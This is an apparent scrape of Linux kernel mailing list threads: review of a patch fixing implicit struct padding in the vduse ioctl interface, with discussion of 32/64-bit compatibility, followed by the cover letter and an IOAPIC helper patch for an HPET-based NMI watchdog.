diff --git a/include/uapi/linux/vduse.h b/include/uapi/linux/vduse.h
index faae7718bd2e..deca8c7b9178 100644
--- a/include/uapi/linux/vduse.h
+++ b/include/uapi/linux/vduse.h
@@ -299,9 +299,13 @@ struct vduse_iova_info {
* Structure used by VDUSE_IOTLB_GET_FD2 ioctl to find an overlapped IOVA region.
*/
struct vduse_iotlb_entry_v2 {
- struct vduse_iotlb_entry v1;
+ __u64 offset;
+ __u64 start;
+ __u64 last;
+ __u8 perm;
+ __u8 padding[7];
__u32 asid;
- __u32 reserved[12];
+ __u32 reserved[11];
};
/*
@@ -371,6 +375,7 @@ struct vduse_iova_range_v2 {
__u64 start;
__u64 last;
__u32 asid;
+ __u32 padding;
};
/**
--
2.39.5
|
On Mon, Feb 2, 2026 at 11:07 AM Arnd Bergmann <arnd@kernel.org> wrote:
I'm just learning about the COMPAT_ stuff but does this mean the
userland app need to call a different ioctl depending if it is
compiled for 32 bits or 64 bits? I guess it is not the case, but how
is that handled?
|
{
"author": "Eugenio Perez Martin <eperezma@redhat.com>",
"date": "Mon, 2 Feb 2026 12:34:48 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
From: Arnd Bergmann <arnd@arndb.de>
The vduse_iova_range_v2 and vduse_iotlb_entry_v2 structures are both
defined in a way that adds implicit padding and is incompatible between
i386 and x86_64 userspace because of the different structure alignment
requirements. Building the header with -Wpadded shows these new warnings:
vduse.h:305:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
vduse.h:374:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
Change the amount of padding in these two structures to align them to
64 bit words and avoid those problems. Since the v1 vduse_iotlb_entry
already has an inconsistent size, do not attempt to reuse the structure
but rather list the members indiviudally, with a fixed amount of
padding.
Fixes: 079212f6877e ("vduse: add vq group asid support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
---
drivers/vdpa/vdpa_user/vduse_dev.c | 40 +++++++++++-------------------
include/uapi/linux/vduse.h | 9 +++++--
2 files changed, 21 insertions(+), 28 deletions(-)
diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index 73d1d517dc6c..405d59610f76 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -1301,7 +1301,7 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
int r = -EINVAL;
struct vhost_iotlb_map *map;
- if (entry->v1.start > entry->v1.last || entry->asid >= dev->nas)
+ if (entry->start > entry->last || entry->asid >= dev->nas)
return -EINVAL;
asid = array_index_nospec(entry->asid, dev->nas);
@@ -1312,18 +1312,18 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
spin_lock(&dev->as[asid].domain->iotlb_lock);
map = vhost_iotlb_itree_first(dev->as[asid].domain->iotlb,
- entry->v1.start, entry->v1.last);
+ entry->start, entry->last);
if (map) {
if (f) {
const struct vdpa_map_file *map_file;
map_file = (struct vdpa_map_file *)map->opaque;
- entry->v1.offset = map_file->offset;
+ entry->offset = map_file->offset;
*f = get_file(map_file->file);
}
- entry->v1.start = map->start;
- entry->v1.last = map->last;
- entry->v1.perm = map->perm;
+ entry->start = map->start;
+ entry->last = map->last;
+ entry->perm = map->perm;
if (capability) {
*capability = 0;
@@ -1363,14 +1363,8 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
break;
ret = -EFAULT;
- if (cmd == VDUSE_IOTLB_GET_FD2) {
- if (copy_from_user(&entry, argp, sizeof(entry)))
- break;
- } else {
- if (copy_from_user(&entry.v1, argp,
- sizeof(entry.v1)))
- break;
- }
+ if (copy_from_user(&entry, argp, _IOC_SIZE(cmd)))
+ break;
ret = -EINVAL;
if (!is_mem_zero((const char *)entry.reserved,
@@ -1385,19 +1379,13 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
if (!f)
break;
- if (cmd == VDUSE_IOTLB_GET_FD2)
- ret = copy_to_user(argp, &entry,
- sizeof(entry));
- else
- ret = copy_to_user(argp, &entry.v1,
- sizeof(entry.v1));
-
+ ret = copy_to_user(argp, &entry, _IOC_SIZE(cmd));
if (ret) {
ret = -EFAULT;
fput(f);
break;
}
- ret = receive_fd(f, NULL, perm_to_file_flags(entry.v1.perm));
+ ret = receive_fd(f, NULL, perm_to_file_flags(entry.perm));
fput(f);
break;
}
@@ -1603,16 +1591,16 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
} else if (info.asid >= dev->nas)
break;
- entry.v1.start = info.start;
- entry.v1.last = info.last;
+ entry.start = info.start;
+ entry.last = info.last;
entry.asid = info.asid;
ret = vduse_dev_iotlb_entry(dev, &entry, NULL,
&info.capability);
if (ret < 0)
break;
- info.start = entry.v1.start;
- info.last = entry.v1.last;
+ info.start = entry.start;
+ info.last = entry.last;
info.asid = entry.asid;
ret = -EFAULT;
diff --git a/include/uapi/linux/vduse.h b/include/uapi/linux/vduse.h
index faae7718bd2e..deca8c7b9178 100644
--- a/include/uapi/linux/vduse.h
+++ b/include/uapi/linux/vduse.h
@@ -299,9 +299,13 @@ struct vduse_iova_info {
* Structure used by VDUSE_IOTLB_GET_FD2 ioctl to find an overlapped IOVA region.
*/
struct vduse_iotlb_entry_v2 {
- struct vduse_iotlb_entry v1;
+ __u64 offset;
+ __u64 start;
+ __u64 last;
+ __u8 perm;
+ __u8 padding[7];
__u32 asid;
- __u32 reserved[12];
+ __u32 reserved[11];
};
/*
@@ -371,6 +375,7 @@ struct vduse_iova_range_v2 {
__u64 start;
__u64 last;
__u32 asid;
+ __u32 padding;
};
/**
--
2.39.5
|
On Mon, Feb 2, 2026 at 12:28 PM Eugenio Perez Martin
<eperezma@redhat.com> wrote:
(I hit "Send" too early).
We could make this padding[3] so reserved keeps being [12]. This way
the struct members keep the same alignment between the commits. Not
super important as there should not be a lot of users of this right
now, we're just introducing it.
|
{
"author": "Eugenio Perez Martin <eperezma@redhat.com>",
"date": "Mon, 2 Feb 2026 12:50:49 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
From: Arnd Bergmann <arnd@arndb.de>
The vduse_iova_range_v2 and vduse_iotlb_entry_v2 structures are both
defined in a way that adds implicit padding and is incompatible between
i386 and x86_64 userspace because of the different structure alignment
requirements. Building the header with -Wpadded shows these new warnings:
vduse.h:305:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
vduse.h:374:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
Change the amount of padding in these two structures to align them to
64 bit words and avoid those problems. Since the v1 vduse_iotlb_entry
already has an inconsistent size, do not attempt to reuse the structure
but rather list the members indiviudally, with a fixed amount of
padding.
Fixes: 079212f6877e ("vduse: add vq group asid support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
---
drivers/vdpa/vdpa_user/vduse_dev.c | 40 +++++++++++-------------------
include/uapi/linux/vduse.h | 9 +++++--
2 files changed, 21 insertions(+), 28 deletions(-)
diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index 73d1d517dc6c..405d59610f76 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -1301,7 +1301,7 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
int r = -EINVAL;
struct vhost_iotlb_map *map;
- if (entry->v1.start > entry->v1.last || entry->asid >= dev->nas)
+ if (entry->start > entry->last || entry->asid >= dev->nas)
return -EINVAL;
asid = array_index_nospec(entry->asid, dev->nas);
@@ -1312,18 +1312,18 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
spin_lock(&dev->as[asid].domain->iotlb_lock);
map = vhost_iotlb_itree_first(dev->as[asid].domain->iotlb,
- entry->v1.start, entry->v1.last);
+ entry->start, entry->last);
if (map) {
if (f) {
const struct vdpa_map_file *map_file;
map_file = (struct vdpa_map_file *)map->opaque;
- entry->v1.offset = map_file->offset;
+ entry->offset = map_file->offset;
*f = get_file(map_file->file);
}
- entry->v1.start = map->start;
- entry->v1.last = map->last;
- entry->v1.perm = map->perm;
+ entry->start = map->start;
+ entry->last = map->last;
+ entry->perm = map->perm;
if (capability) {
*capability = 0;
@@ -1363,14 +1363,8 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
break;
ret = -EFAULT;
- if (cmd == VDUSE_IOTLB_GET_FD2) {
- if (copy_from_user(&entry, argp, sizeof(entry)))
- break;
- } else {
- if (copy_from_user(&entry.v1, argp,
- sizeof(entry.v1)))
- break;
- }
+ if (copy_from_user(&entry, argp, _IOC_SIZE(cmd)))
+ break;
ret = -EINVAL;
if (!is_mem_zero((const char *)entry.reserved,
@@ -1385,19 +1379,13 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
if (!f)
break;
- if (cmd == VDUSE_IOTLB_GET_FD2)
- ret = copy_to_user(argp, &entry,
- sizeof(entry));
- else
- ret = copy_to_user(argp, &entry.v1,
- sizeof(entry.v1));
-
+ ret = copy_to_user(argp, &entry, _IOC_SIZE(cmd));
if (ret) {
ret = -EFAULT;
fput(f);
break;
}
- ret = receive_fd(f, NULL, perm_to_file_flags(entry.v1.perm));
+ ret = receive_fd(f, NULL, perm_to_file_flags(entry.perm));
fput(f);
break;
}
@@ -1603,16 +1591,16 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
} else if (info.asid >= dev->nas)
break;
- entry.v1.start = info.start;
- entry.v1.last = info.last;
+ entry.start = info.start;
+ entry.last = info.last;
entry.asid = info.asid;
ret = vduse_dev_iotlb_entry(dev, &entry, NULL,
&info.capability);
if (ret < 0)
break;
- info.start = entry.v1.start;
- info.last = entry.v1.last;
+ info.start = entry.start;
+ info.last = entry.last;
info.asid = entry.asid;
ret = -EFAULT;
diff --git a/include/uapi/linux/vduse.h b/include/uapi/linux/vduse.h
index faae7718bd2e..deca8c7b9178 100644
--- a/include/uapi/linux/vduse.h
+++ b/include/uapi/linux/vduse.h
@@ -299,9 +299,13 @@ struct vduse_iova_info {
* Structure used by VDUSE_IOTLB_GET_FD2 ioctl to find an overlapped IOVA region.
*/
struct vduse_iotlb_entry_v2 {
- struct vduse_iotlb_entry v1;
+ __u64 offset;
+ __u64 start;
+ __u64 last;
+ __u8 perm;
+ __u8 padding[7];
__u32 asid;
- __u32 reserved[12];
+ __u32 reserved[11];
};
/*
@@ -371,6 +375,7 @@ struct vduse_iova_range_v2 {
__u64 start;
__u64 last;
__u32 asid;
+ __u32 padding;
};
/**
--
2.39.5
|
On Mon, Feb 2, 2026, at 12:34, Eugenio Perez Martin wrote:
In a definition like
#define VDUSE_IOTLB_GET_FD _IOWR(VDUSE_BASE, 0x10, struct vduse_iotlb_entry)
The resulting integer value encodes sizeof(struct vduse_iotlb_entry)
in some of the bits. Since x86-32 and x86-64 have different
sizes for this particular structure, the command codes are
different for the same macro. The recommendation from
Documentation/driver-api/ioctl.rst is to use structures with
a consistent layout across all architectures to avoid that.
The normal way to handle this once it has gone wrong is to split
out the actual handler into a function that takes the kernel
structure, and a .compat_ioctl() handler that copies the
32-bit structure to the stack in the correct format.
Since the v1 structures here are /almost/ compatible aside from
the padding at the end, my patch here takes a shortcut and does
not add a custom .compat_ioctl handler but instead changes
the native version on x86-64 to deal with both layouts.
This does mean that the kernel driver now also accepts the
64-bit layout coming from compat tasks, and the compat layout
coming from 64-bit tasks.
Nothing in userspace changes, as it still just uses the existing
VDUSE_IOTLB_GET_FD macro, and the kernel continues to handle
the native layout as before.
Arnd
|
{
"author": "\"Arnd Bergmann\" <arnd@arndb.de>",
"date": "Mon, 02 Feb 2026 12:59:03 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
From: Arnd Bergmann <arnd@arndb.de>
The vduse_iova_range_v2 and vduse_iotlb_entry_v2 structures are both
defined in a way that adds implicit padding and is incompatible between
i386 and x86_64 userspace because of the different structure alignment
requirements. Building the header with -Wpadded shows these new warnings:
vduse.h:305:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
vduse.h:374:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
Change the amount of padding in these two structures to align them to
64 bit words and avoid those problems. Since the v1 vduse_iotlb_entry
already has an inconsistent size, do not attempt to reuse the structure
but rather list the members indiviudally, with a fixed amount of
padding.
Fixes: 079212f6877e ("vduse: add vq group asid support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
---
drivers/vdpa/vdpa_user/vduse_dev.c | 40 +++++++++++-------------------
include/uapi/linux/vduse.h | 9 +++++--
2 files changed, 21 insertions(+), 28 deletions(-)
diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index 73d1d517dc6c..405d59610f76 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -1301,7 +1301,7 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
int r = -EINVAL;
struct vhost_iotlb_map *map;
- if (entry->v1.start > entry->v1.last || entry->asid >= dev->nas)
+ if (entry->start > entry->last || entry->asid >= dev->nas)
return -EINVAL;
asid = array_index_nospec(entry->asid, dev->nas);
@@ -1312,18 +1312,18 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
spin_lock(&dev->as[asid].domain->iotlb_lock);
map = vhost_iotlb_itree_first(dev->as[asid].domain->iotlb,
- entry->v1.start, entry->v1.last);
+ entry->start, entry->last);
if (map) {
if (f) {
const struct vdpa_map_file *map_file;
map_file = (struct vdpa_map_file *)map->opaque;
- entry->v1.offset = map_file->offset;
+ entry->offset = map_file->offset;
*f = get_file(map_file->file);
}
- entry->v1.start = map->start;
- entry->v1.last = map->last;
- entry->v1.perm = map->perm;
+ entry->start = map->start;
+ entry->last = map->last;
+ entry->perm = map->perm;
if (capability) {
*capability = 0;
@@ -1363,14 +1363,8 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
break;
ret = -EFAULT;
- if (cmd == VDUSE_IOTLB_GET_FD2) {
- if (copy_from_user(&entry, argp, sizeof(entry)))
- break;
- } else {
- if (copy_from_user(&entry.v1, argp,
- sizeof(entry.v1)))
- break;
- }
+ if (copy_from_user(&entry, argp, _IOC_SIZE(cmd)))
+ break;
ret = -EINVAL;
if (!is_mem_zero((const char *)entry.reserved,
@@ -1385,19 +1379,13 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
if (!f)
break;
- if (cmd == VDUSE_IOTLB_GET_FD2)
- ret = copy_to_user(argp, &entry,
- sizeof(entry));
- else
- ret = copy_to_user(argp, &entry.v1,
- sizeof(entry.v1));
-
+ ret = copy_to_user(argp, &entry, _IOC_SIZE(cmd));
if (ret) {
ret = -EFAULT;
fput(f);
break;
}
- ret = receive_fd(f, NULL, perm_to_file_flags(entry.v1.perm));
+ ret = receive_fd(f, NULL, perm_to_file_flags(entry.perm));
fput(f);
break;
}
@@ -1603,16 +1591,16 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
} else if (info.asid >= dev->nas)
break;
- entry.v1.start = info.start;
- entry.v1.last = info.last;
+ entry.start = info.start;
+ entry.last = info.last;
entry.asid = info.asid;
ret = vduse_dev_iotlb_entry(dev, &entry, NULL,
&info.capability);
if (ret < 0)
break;
- info.start = entry.v1.start;
- info.last = entry.v1.last;
+ info.start = entry.start;
+ info.last = entry.last;
info.asid = entry.asid;
ret = -EFAULT;
diff --git a/include/uapi/linux/vduse.h b/include/uapi/linux/vduse.h
index faae7718bd2e..deca8c7b9178 100644
--- a/include/uapi/linux/vduse.h
+++ b/include/uapi/linux/vduse.h
@@ -299,9 +299,13 @@ struct vduse_iova_info {
* Structure used by VDUSE_IOTLB_GET_FD2 ioctl to find an overlapped IOVA region.
*/
struct vduse_iotlb_entry_v2 {
- struct vduse_iotlb_entry v1;
+ __u64 offset;
+ __u64 start;
+ __u64 last;
+ __u8 perm;
+ __u8 padding[7];
__u32 asid;
- __u32 reserved[12];
+ __u32 reserved[11];
};
/*
@@ -371,6 +375,7 @@ struct vduse_iova_range_v2 {
__u64 start;
__u64 last;
__u32 asid;
+ __u32 padding;
};
/**
--
2.39.5
|
On Mon, Feb 2, 2026, at 12:50, Eugenio Perez Martin wrote:
I think it's more readable without the MIN(), but I don't mind
adding it either.
I think that is too risky, as it would overlay 'asid' on top of
previously uninitialized padding fields coming from userspace
on most architectures. Since there was previously no is_mem_zero()
check for the padding, I don't think it should be reused at all.
Arnd
|
{
"author": "\"Arnd Bergmann\" <arnd@arndb.de>",
"date": "Mon, 02 Feb 2026 13:06:54 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
From: Arnd Bergmann <arnd@arndb.de>
The vduse_iova_range_v2 and vduse_iotlb_entry_v2 structures are both
defined in a way that adds implicit padding and is incompatible between
i386 and x86_64 userspace because of the different structure alignment
requirements. Building the header with -Wpadded shows these new warnings:
vduse.h:305:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
vduse.h:374:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
Change the amount of padding in these two structures to align them to
64 bit words and avoid those problems. Since the v1 vduse_iotlb_entry
already has an inconsistent size, do not attempt to reuse the structure
but rather list the members indiviudally, with a fixed amount of
padding.
Fixes: 079212f6877e ("vduse: add vq group asid support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
---
drivers/vdpa/vdpa_user/vduse_dev.c | 40 +++++++++++-------------------
include/uapi/linux/vduse.h | 9 +++++--
2 files changed, 21 insertions(+), 28 deletions(-)
diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index 73d1d517dc6c..405d59610f76 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -1301,7 +1301,7 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
int r = -EINVAL;
struct vhost_iotlb_map *map;
- if (entry->v1.start > entry->v1.last || entry->asid >= dev->nas)
+ if (entry->start > entry->last || entry->asid >= dev->nas)
return -EINVAL;
asid = array_index_nospec(entry->asid, dev->nas);
@@ -1312,18 +1312,18 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
spin_lock(&dev->as[asid].domain->iotlb_lock);
map = vhost_iotlb_itree_first(dev->as[asid].domain->iotlb,
- entry->v1.start, entry->v1.last);
+ entry->start, entry->last);
if (map) {
if (f) {
const struct vdpa_map_file *map_file;
map_file = (struct vdpa_map_file *)map->opaque;
- entry->v1.offset = map_file->offset;
+ entry->offset = map_file->offset;
*f = get_file(map_file->file);
}
- entry->v1.start = map->start;
- entry->v1.last = map->last;
- entry->v1.perm = map->perm;
+ entry->start = map->start;
+ entry->last = map->last;
+ entry->perm = map->perm;
if (capability) {
*capability = 0;
@@ -1363,14 +1363,8 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
break;
ret = -EFAULT;
- if (cmd == VDUSE_IOTLB_GET_FD2) {
- if (copy_from_user(&entry, argp, sizeof(entry)))
- break;
- } else {
- if (copy_from_user(&entry.v1, argp,
- sizeof(entry.v1)))
- break;
- }
+ if (copy_from_user(&entry, argp, _IOC_SIZE(cmd)))
+ break;
ret = -EINVAL;
if (!is_mem_zero((const char *)entry.reserved,
@@ -1385,19 +1379,13 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
if (!f)
break;
- if (cmd == VDUSE_IOTLB_GET_FD2)
- ret = copy_to_user(argp, &entry,
- sizeof(entry));
- else
- ret = copy_to_user(argp, &entry.v1,
- sizeof(entry.v1));
-
+ ret = copy_to_user(argp, &entry, _IOC_SIZE(cmd));
if (ret) {
ret = -EFAULT;
fput(f);
break;
}
- ret = receive_fd(f, NULL, perm_to_file_flags(entry.v1.perm));
+ ret = receive_fd(f, NULL, perm_to_file_flags(entry.perm));
fput(f);
break;
}
@@ -1603,16 +1591,16 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
} else if (info.asid >= dev->nas)
break;
- entry.v1.start = info.start;
- entry.v1.last = info.last;
+ entry.start = info.start;
+ entry.last = info.last;
entry.asid = info.asid;
ret = vduse_dev_iotlb_entry(dev, &entry, NULL,
&info.capability);
if (ret < 0)
break;
- info.start = entry.v1.start;
- info.last = entry.v1.last;
+ info.start = entry.start;
+ info.last = entry.last;
info.asid = entry.asid;
ret = -EFAULT;
diff --git a/include/uapi/linux/vduse.h b/include/uapi/linux/vduse.h
index faae7718bd2e..deca8c7b9178 100644
--- a/include/uapi/linux/vduse.h
+++ b/include/uapi/linux/vduse.h
@@ -299,9 +299,13 @@ struct vduse_iova_info {
* Structure used by VDUSE_IOTLB_GET_FD2 ioctl to find an overlapped IOVA region.
*/
struct vduse_iotlb_entry_v2 {
- struct vduse_iotlb_entry v1;
+ __u64 offset;
+ __u64 start;
+ __u64 last;
+ __u8 perm;
+ __u8 padding[7];
__u32 asid;
- __u32 reserved[12];
+ __u32 reserved[11];
};
/*
@@ -371,6 +375,7 @@ struct vduse_iova_range_v2 {
__u64 start;
__u64 last;
__u32 asid;
+ __u32 padding;
};
/**
--
2.39.5
|
On Mon, Feb 02, 2026 at 12:59:03PM +0100, Arnd Bergmann wrote:
I think .compat_ioctl would be cleaner frankly. Just look at
all the ifdefery. And who knows what broken-ness userspace
comes up with with this approach. Better use the standard approach.
|
{
"author": "\"Michael S. Tsirkin\" <mst@redhat.com>",
"date": "Mon, 2 Feb 2026 11:45:13 -0500",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 0/2] Add HPET NMI Watchdog support
|
The current NMI watchdog relies on performance counters and consistently
occupies one on each CPU. When running virtual machines, we want to pass
performance counters to virtual machines so they can make use of them.
In addition the host system wants to use performance counters to check
the system to identify when anything looks abnormal, such as split
locks.
That makes PMCs a precious resource. So any PMC we can free up is a PMC
we can use for something useful. That made me look at the NMI watchdog.
The PMC based NMI watchdog implementation does not actually need any
performance counting. It just needs a per-CPU NMI timer source. X86
systems can make anything that emits an interrupt descriptor (IOAPIC,
MSI(-X), etc) become an NMI source. So any time goes. Including the
HPET. And while they can't really operate per-CPU, in almost all cases
you only really want the NMI on *all* CPUs, rather than per-CPU.
So I took a stab at building an HPET based NMI watchdog. In my (QEMU
based) testing, it's fully functional and can successfully detect when
CPUs get stuck. It even survives suspend/resume cycles.
For now, its enablement is a config time option because the hardlockup
framework does not support dynamic switching of multiple detectors.
That's ok for our use case. But maybe something for the interested
reader to tackle eventually :).
You can enable the HPET watchdog by default by setting
CONFIG_HARDLOCKUP_DETECTOR_HPET_DEFAULT=y
or passing "hpet=watchdog" to the kernel command line. When active, it
will emit a kernel log message to indicate it works:
[ 0.179176] hpet: HPET watchdog initialized on timer 0, GSI 2
The HPET can only be in either watchdog or generic mode. I am a bit
worried about IO-APIC pin allocation logic, so I opted to reuse the
generic timer pin. And that means I'm effectively breaking the normal
interrupt delivery path. so the easy way out was to say when watchdog is
active, PIT and HPET are not available as timer sources. Which is ok on
modern systems. There are way too many (unreliable) timer sources on x86
already. Trimming a few surely won't hurt.
I'm open to inputs on how to make the HPET multi-purpose though, in case
anyone feels strongly about it.
Alex
Alexander Graf (2):
x86/ioapic: Add NMI delivery configuration helper
hpet: Add HPET-based NMI watchdog support
.../admin-guide/kernel-parameters.txt | 5 +-
arch/x86/Kconfig | 19 ++
arch/x86/include/asm/io_apic.h | 2 +
arch/x86/kernel/apic/io_apic.c | 32 ++++
arch/x86/kernel/hpet.c | 172 ++++++++++++++++++
arch/x86/kernel/i8253.c | 9 +
drivers/char/hpet.c | 3 +
include/linux/hpet.h | 14 ++
8 files changed, 255 insertions(+), 1 deletion(-)
--
2.47.1
Amazon Web Services Development Center Germany GmbH
Tamara-Danz-Str. 13
10243 Berlin
Geschaeftsfuehrung: Christof Hellmis, Andreas Stieger
Eingetragen am Amtsgericht Charlottenburg unter HRB 257764 B
Sitz: Berlin
Ust-ID: DE 365 538 597
|
To implement an HPET based NMI watchdog, the HPET code will need to
reconfigure an IOAPIC pin to NMI mode. Add a function that allows driver
code to configure an IOAPIC pin for NMI delivery mode.
(Disclaimer: Some of this code was written with the help of Kiro, an AI
coding assistant)
Signed-off-by: Alexander Graf <graf@amazon.com>
---
arch/x86/include/asm/io_apic.h | 2 ++
arch/x86/kernel/apic/io_apic.c | 32 ++++++++++++++++++++++++++++++++
2 files changed, 34 insertions(+)
diff --git a/arch/x86/include/asm/io_apic.h b/arch/x86/include/asm/io_apic.h
index 0d806513c4b3..58cfb338bf39 100644
--- a/arch/x86/include/asm/io_apic.h
+++ b/arch/x86/include/asm/io_apic.h
@@ -158,6 +158,8 @@ extern void mp_save_irq(struct mpc_intsrc *m);
extern void disable_ioapic_support(void);
+extern int ioapic_set_nmi(u32 gsi, bool broadcast);
+
extern void __init io_apic_init_mappings(void);
extern unsigned int native_io_apic_read(unsigned int apic, unsigned int reg);
extern void native_restore_boot_irq_mode(void);
diff --git a/arch/x86/kernel/apic/io_apic.c b/arch/x86/kernel/apic/io_apic.c
index 28f934f05a85..006f328929cd 100644
--- a/arch/x86/kernel/apic/io_apic.c
+++ b/arch/x86/kernel/apic/io_apic.c
@@ -2951,6 +2951,38 @@ int mp_irqdomain_ioapic_idx(struct irq_domain *domain)
return (int)(long)domain->host_data;
}
+/**
+ * ioapic_set_nmi - Configure an IOAPIC pin for NMI delivery
+ * @gsi: Global System Interrupt number
+ * @broadcast: true to broadcast to all CPUs, false to send to CPU 0 only
+ *
+ * Configures the specified GSI for NMI delivery mode.
+ *
+ * Returns 0 on success, negative error code on failure.
+ */
+int ioapic_set_nmi(u32 gsi, bool broadcast)
+{
+ struct IO_APIC_route_entry entry = { };
+ int ioapic_idx, pin;
+
+ ioapic_idx = mp_find_ioapic(gsi);
+ if (ioapic_idx < 0)
+ return -ENODEV;
+
+ pin = mp_find_ioapic_pin(ioapic_idx, gsi);
+ if (pin < 0)
+ return -ENODEV;
+
+ entry.delivery_mode = APIC_DELIVERY_MODE_NMI;
+ entry.destid_0_7 = broadcast ? 0xFF : 0;
+ entry.dest_mode_logical = 0;
+ entry.masked = 0;
+
+ ioapic_write_entry(ioapic_idx, pin, entry);
+
+ return 0;
+}
+
const struct irq_domain_ops mp_ioapic_irqdomain_ops = {
.alloc = mp_irqdomain_alloc,
.free = mp_irqdomain_free,
--
2.47.1
Amazon Web Services Development Center Germany GmbH
Tamara-Danz-Str. 13
10243 Berlin
Geschaeftsfuehrung: Christof Hellmis, Andreas Stieger
Eingetragen am Amtsgericht Charlottenburg unter HRB 257764 B
Sitz: Berlin
Ust-ID: DE 365 538 597
|
{
"author": "Alexander Graf <graf@amazon.com>",
"date": "Mon, 2 Feb 2026 17:43:15 +0000",
"thread_id": "20260202174316.65044-2-graf@amazon.com.mbox.gz"
}
|
lkml
|
[PATCH 0/2] Add HPET NMI Watchdog support
|
The current NMI watchdog relies on performance counters and consistently
occupies one on each CPU. When running virtual machines, we want to pass
performance counters to virtual machines so they can make use of them.
In addition the host system wants to use performance counters to check
the system to identify when anything looks abnormal, such as split
locks.
That makes PMCs a precious resource. So any PMC we can free up is a PMC
we can use for something useful. That made me look at the NMI watchdog.
The PMC based NMI watchdog implementation does not actually need any
performance counting. It just needs a per-CPU NMI timer source. X86
systems can make anything that emits an interrupt descriptor (IOAPIC,
MSI(-X), etc) become an NMI source. So any time goes. Including the
HPET. And while they can't really operate per-CPU, in almost all cases
you only really want the NMI on *all* CPUs, rather than per-CPU.
So I took a stab at building an HPET based NMI watchdog. In my (QEMU
based) testing, it's fully functional and can successfully detect when
CPUs get stuck. It even survives suspend/resume cycles.
For now, its enablement is a config time option because the hardlockup
framework does not support dynamic switching of multiple detectors.
That's ok for our use case. But maybe something for the interested
reader to tackle eventually :).
You can enable the HPET watchdog by default by setting
CONFIG_HARDLOCKUP_DETECTOR_HPET_DEFAULT=y
or passing "hpet=watchdog" to the kernel command line. When active, it
will emit a kernel log message to indicate it works:
[ 0.179176] hpet: HPET watchdog initialized on timer 0, GSI 2
The HPET can only be in either watchdog or generic mode. I am a bit
worried about IO-APIC pin allocation logic, so I opted to reuse the
generic timer pin. And that means I'm effectively breaking the normal
interrupt delivery path. so the easy way out was to say when watchdog is
active, PIT and HPET are not available as timer sources. Which is ok on
modern systems. There are way too many (unreliable) timer sources on x86
already. Trimming a few surely won't hurt.
I'm open to inputs on how to make the HPET multi-purpose though, in case
anyone feels strongly about it.
Alex
Alexander Graf (2):
x86/ioapic: Add NMI delivery configuration helper
hpet: Add HPET-based NMI watchdog support
.../admin-guide/kernel-parameters.txt | 5 +-
arch/x86/Kconfig | 19 ++
arch/x86/include/asm/io_apic.h | 2 +
arch/x86/kernel/apic/io_apic.c | 32 ++++
arch/x86/kernel/hpet.c | 172 ++++++++++++++++++
arch/x86/kernel/i8253.c | 9 +
drivers/char/hpet.c | 3 +
include/linux/hpet.h | 14 ++
8 files changed, 255 insertions(+), 1 deletion(-)
--
2.47.1
Amazon Web Services Development Center Germany GmbH
Tamara-Danz-Str. 13
10243 Berlin
Geschaeftsfuehrung: Christof Hellmis, Andreas Stieger
Eingetragen am Amtsgericht Charlottenburg unter HRB 257764 B
Sitz: Berlin
Ust-ID: DE 365 538 597
|
